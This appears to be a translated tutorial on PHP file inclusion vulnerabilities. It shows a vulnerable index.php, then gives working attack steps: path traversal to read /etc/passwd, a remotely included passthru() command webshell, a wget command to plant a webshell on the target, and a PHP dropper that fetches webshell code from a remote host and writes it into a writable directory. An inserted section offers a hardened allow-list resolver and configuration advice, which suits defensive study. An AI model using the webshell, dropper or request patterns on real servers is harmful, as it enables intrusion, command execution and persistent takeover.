I. Dangerous functions involved: include(), require(), include_once(), require_once()
include() & require(): include and run the specified file.
The two constructs are identical except in how they handle failure: include() emits a warning and carries on, while require() raises a fatal error. In other words, if you want processing of the page to stop when a file is missing, use require(); with include() the script keeps running.
If allow_url_fopen is enabled in PHP (it is on by default), the file to include can also be given as a URL (over HTTP or another supported stream wrapper) instead of a local path. Note that since PHP 5.2.0 including a URL additionally requires allow_url_include=On, which is Off by default; allow_url_fopen alone is no longer enough. If the remote server itself interprets the file as PHP, only its output is included, and variables can be passed to it with a query string as with an HTTP GET; if the remote server hands the file out as plain text, the PHP code in it runs on the including server.
http://www.phpe.net/manual/function.include.php
require_once() & include_once()
The require_once() and include_once() statements include and run the specified file during script execution, just like require() and include(). The only difference is that if the code in the file has already been included, it is not included again. This is useful when the same file might be included more than once during a run and you want to make sure it is included only once, to avoid function redefinitions and variables being reassigned.
http://www.phpe.net/manual/function.require-once.php
II. Why use file inclusion?
When programmers write programs they do not like doing the same thing, or writing the same code (some common functions, say), several times over, so the shared code is put into a separate file such as share.php and included from the other files. In PHP we use the functions listed above to do this. The workflow is: if main.php needs share.php, I write include("share.php") in main.php and can then call the functions in share.php. Here the name of the file to include is hard-coded, and there is no problem and no vulnerability. So where exactly is the problem?
Sometimes you cannot know in advance which file to include. For example, look at the index.php code below:
Code:
---------------------------
<?php
if (!empty($_GET['page'])) {
    include $_GET['page'];      // the value comes straight from the URL, unfiltered
} else {
    include "home.php";
}
---------------------------
This is an ordinary piece of PHP. How does it work? That involves the meaning of $_GET, which I will not go into here (that would be an article about HTTP). If you do not yet know what GET, POST and so on are, look them up on Google first.
A URL used with the code above might be http://www.php100.com/php/index.php?page=main.php or http://www.php100.com/php/index.php?page=downloads.php:
1. The URL above is requested, and index.php reads the value of page ($_GET['page']).
2. It checks whether $_GET['page'] is empty. If it is not (here it is main.php), that file is included with include.
3. If $_GET['page'] is empty, the else branch runs and home.php is included.
III. Where does the vulnerability come from?
You may say this is all fine: including files dynamically according to the URL is very convenient, so how can it cause a vulnerability? The answer is that we are not well behaved. We like to be different, we do not follow the site's own links, and we may want to name our own file to include. For example, we might just type the following URL: http://www.1steam.cn/php/index.php?page=hello.php. Our index.php obediently follows the steps above: it reads page as hello.php and goes to include(hello.php). Now there is a problem, because there is no hello.php file, so the include emits warnings similar to the following:
Quote:
Warning: include(hello.php) [function.include]: failed to open stream: No such file or directory in /vhost/wwwroot/php/index.php on line 3
Warning: include() [function.include]: Failed opening 'hello.php' for inclusion (include_path='.:') in /vhost/wwwroot/php/index.php on line 3
The first warning says the specified file hello.php could not be opened: there is no such file at that path. The second follows from the first: because the file was not found, include() reports that the inclusion failed. Note also that both warnings leak the absolute path of the script, which we will make use of below.
IV. How to exploit it
We have seen above that there is a problem, so how do we exploit such a vulnerability? There are many exploitation methods, but they are essentially the same. Here I will cover three common ones:
1. Include other files on the target host to read them
As we saw above, the page parameter is not filtered, so we can point it at any other sensitive file on the target host. The warnings above already exposed the absolute path (/vhost/wwwroot/php/), so we can probe repeatedly and include other files. For example, http://www.php100.com/php/index.php?page=./txt.txt reads txt.txt from the current directory (an included file that contains no PHP tags is simply printed out verbatim), and ../../ walks up the directory tree, since ../ is not filtered either. You can also give an absolute path directly to read sensitive system files, for example http://www.php100.com/php/index.php?page=/etc/passwd. If the target host does not restrict permissions strictly, or Apache runs with high privileges, the contents of the file come back. Otherwise you get a warning: "failed to open stream: Permission denied" if the filesystem permissions block the web server user, or "open_basedir restriction in effect" if PHP's open_basedir setting confines scripts to a directory tree.
2. Include a runnable PHP trojan from a remote host
If allow_url_fopen is enabled on the target host (on by default, and few people change it; on PHP 5.2.0 and later allow_url_include must also be on, and that one is off by default), we have much more room: we can specify a webshell containing PHP code hosted at some other URL and have it run directly. For example, I first write a small PHP script that runs a command (comments added, it should be easy to follow) and save it as cmd.txt (the extension does not matter, as long as the content is PHP).
<?php
if (get_magic_quotes_gpc()) {
    // magic_quotes adds backslashes to request data; strip them so the command arrives as typed
    // (magic_quotes and get_magic_quotes_gpc() no longer exist in PHP 8; kept here as the post wrote it)
    $_REQUEST["cmd"] = stripslashes($_REQUEST["cmd"]);
}
ini_set("max_execution_time", 0);   // execution time limit for this file; 0 means unlimited
echo "\n1.s.t\n";                   // print the start marker of the returned output
passthru($_REQUEST["cmd"]);         // run the command given in cmd and pass its raw output through
echo "\n1.s.t\n";                   // print the end marker
?>
The file above takes the command given in cmd, runs it with passthru(), and returns the output between the two 1.s.t markers. Save it on a host of our own (it does not need to support PHP, and in fact must not execute it, otherwise only the output would be served), as long as it can be fetched over HTTP, for example at http://www.php100.com/developer.txt. On the vulnerable host we then request the following URL to exploit it: http://www.php100.com/php/index.php?page=http://www.php100.net/developer.txt&cmd=ls. The command to run goes after cmd=. It has to be a second parameter of index.php, separated with &: if it is appended to the remote URL with a ? instead, it becomes part of the page value, is sent to our own server, and never reaches $_REQUEST["cmd"] on the target. Other commonly used commands (taking *nix as the example) are:
Quote:
ls -l: list directories and files (the equivalent of dir on Windows)
pwd: show the current absolute path
id / whoami: show the current user
wget: download the file at a given URL
and so on; search for others as needed.
The method above gives us a webshell (the PHP file is not on the target machine, but it is a webshell all the same, isn't it? Haha).
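The defensive side of sections IV.1 and IV.2, as an added example that is not part of the original post: a hardened replacement for the index.php from section II that refuses traversal, absolute paths and URL wrappers before anything reaches include(). The pages/ directory, the page names in the allow-list and the 1.s.t-style test inputs are assumptions for illustration; when run from the command line it creates a temporary pages directory and checks itself against the constructed inputs.

```php
<?php
// Added example (not from the original post): hardened page resolver for the
// index.php shown in section II. Directory, allow-list and test inputs are assumed.
declare(strict_types=1);

/**
 * Resolve the user-supplied "page" value to a file we are willing to include.
 * Returns the absolute path, or null if the request must be refused.
 */
function resolve_page(string $page, string $base, array $allowed): ?string
{
    // 1. Never let a URL or stream wrapper (http://, ftp://, php://, data://,
    //    phar:// ...) reach include(). This is what the remote include in
    //    section IV.2 relies on, regardless of allow_url_include.
    if (preg_match('#^[a-z][a-z0-9+.-]*://#i', $page)) {
        return null;
    }
    // 2. Allow-list of bare page names, the only values we ever expect.
    //    "./txt.txt", "../../etc/passwd", "/etc/passwd" and "main\0.txt" all
    //    fail this comparison, so no path built from user input is ever opened.
    if (!in_array($page, $allowed, true)) {
        return null;
    }
    // 3. Defence in depth: resolve the final path and confirm it still lies
    //    inside the pages directory, even if the allow-list is edited later.
    $root = realpath($base);
    $full = realpath($base . DIRECTORY_SEPARATOR . $page . '.php');
    if ($root === false || $full === false) {
        return null;                      // missing file: no warning, no path disclosure
    }
    if (strncmp($full, $root . DIRECTORY_SEPARATOR, strlen($root) + 1) !== 0) {
        return null;
    }
    return $full;
}

$allowed = ['home', 'main', 'downloads'];     // assumed page names
$base    = __DIR__ . '/pages';                // assumed location of the page files

if (PHP_SAPI === 'cli') {
    // Stand-alone self-check with constructed inputs in a temporary directory.
    $base = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
    mkdir($base);
    file_put_contents($base . '/main.php', "<?php echo \"main page\\n\";");
    $cases = [
        'main'                                => true,   // legitimate request
        'downloads'                           => false,  // allowed name, file absent
        './txt.txt'                           => false,  // read from current directory
        '../../etc/passwd'                    => false,  // directory traversal
        '/etc/passwd'                         => false,  // absolute path
        'http://www.php100.net/developer.txt' => false,  // remote include
        "main\0.txt"                          => false,  // NUL-byte truncation trick
    ];
    foreach ($cases as $input => $expectInclude) {
        $path = resolve_page((string) $input, $base, $allowed);
        $ok   = (($path !== null) === $expectInclude);
        printf("%-40s -> %s %s\n", str_replace("\0", '\0', (string) $input),
               $path === null ? 'refused' : 'include ' . basename($path),
               $ok ? '' : '(UNEXPECTED)');
    }
    unlink($base . '/main.php');
    rmdir($base);
    exit;
}

$page = isset($_GET['page']) ? (string) $_GET['page'] : 'home';
$file = resolve_page($page, $base, $allowed);
if ($file === null) {
    http_response_code(404);
    exit('Page not found');               // one generic message, no include() warnings
}
include $file;
```

The allow-list is the real control; the wrapper check and the realpath() containment test only limit the damage if someone later widens it. Independently of the code, keep allow_url_include=Off in php.ini (its default), consider allow_url_fopen=Off if the application never fetches URLs, and set open_basedir so that a slip elsewhere cannot reach /etc/passwd.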
3. Include a PHP file that creates a file (a real webshell on the target)
Some people feel more at ease with a real webshell on the target machine: if someone notices and fixes the vulnerability, we can no longer remotely include the "pseudo" webshell above, right? That is understandable, so let's continue. To get a real webshell there are again two common methods:
1) Download a webshell with a command such as wget
This is simple and often used. With the pseudo webshell obtained above we can run commands, so we can also call on a very powerful tool on the system, wget. It has a great many options (Google will give you more than you want), but we do not need anything complicated: a single -O (--output-document=file, write the document to the given file) does the job.
The precondition is that you have placed a webshell containing PHP code somewhere reachable over HTTP or FTP, for example http://www.php100.com/1stphp.txt, with the webshell code written into that file. Then we request the following URL (the spaces in the command must be URL-encoded as %20 or +): http://www.php100.com/php/index.php?page=http://www.php100.com/developer.txt&cmd=wget http://www.php100.net/1stphp.txt -O 1stphp.php. If the current directory is writable, this gives a webshell file named 1stphp.php; if it is not writable, another method is needed.
2) Create the file from PHP
The wget approach can fail when the current directory is not writable, or when the command is disabled (or not installed) on the target host. In that case we go back to the file inclusion vulnerability and remotely include a PHP script that creates (writes) the file instead. Its content is as follows:
<?php
$f = file_get_contents("http://www.php100.com/1stphp.txt");   // fetch the webshell source from our server (needs allow_url_fopen only)
$ff = fopen("./upload/1st.php", "a");                          // open/create the file in a directory we found to be writable
fwrite($ff, $f);                                               // write the fetched content into it
fclose($ff);                                                   // close and save the file
?>
This writes the same PHP file that wget would have downloaded, but does it from PHP. Using the earlier pseudo webshell (cmd=ls -l), first find a writable directory such as upload, then create the file there as ./upload/1st.php. That gives us our webshell.